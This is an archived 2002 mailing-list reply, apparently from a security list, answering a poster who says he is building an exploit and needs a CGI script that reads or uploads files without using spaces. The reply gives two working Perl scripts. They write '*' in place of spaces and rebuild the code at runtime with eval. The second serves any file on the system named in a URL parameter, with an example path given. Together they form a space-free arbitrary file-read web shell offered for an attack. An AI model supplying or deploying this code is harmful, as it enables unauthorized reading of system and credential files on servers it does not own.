Re: Coding Conservative CGI Perl

From: Pete Krawczyk (petekat_private)
Date: Mon Jun 10 2002 - 11:59:21 PDT

  • Next message: Randy Janinda: "Re: Coding Conservative CGI Perl"

    From: Justin Lavoie <acid_rainat_private>
    Date: Mon, 10 Jun 2002 00:27:05 -0500
    Subject: Coding Conservative CGI Perl
    
    }I'm working on a type of exploit and in doing so I must develop a *.cgi
    }file that'd run on a Linux and Windows box to allow me to read or upload
    }file (whatever is possible) without the use of spaces!
    
    Well, what would be wrong with:
    
    --- O< ---
    #!/usr/bin/perl
    $g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#;
    $g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
    --- O< ---
    
    Or, to, say, read any file on a system:
    --- O< ---
    #!/usr/bin/perl
    $g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n");
    print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#;
    $g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
    --- O< ---
    (change the MIME type as necessary)
    and call with .cgi?file=/etc/motd
    
    In this case, you'd replace every space with a * between the two hash
    marks, and you would have to escape any hash mark or backslash you had,
    but as you'll notice, you can do anything you'd like and have it convert
    on the fly. You could even change the * to any other character if you'd
    like.
    
    Perl is very forgiving about most environments, and you can get around 
    most restrictions if you try.
    
    -Pete K
    -- 
    Pete Krawczyk
      petek at bsod dot net
    



    This archive was generated by hypermail 2b30 : Mon Jun 10 2002 - 13:27:00 PDT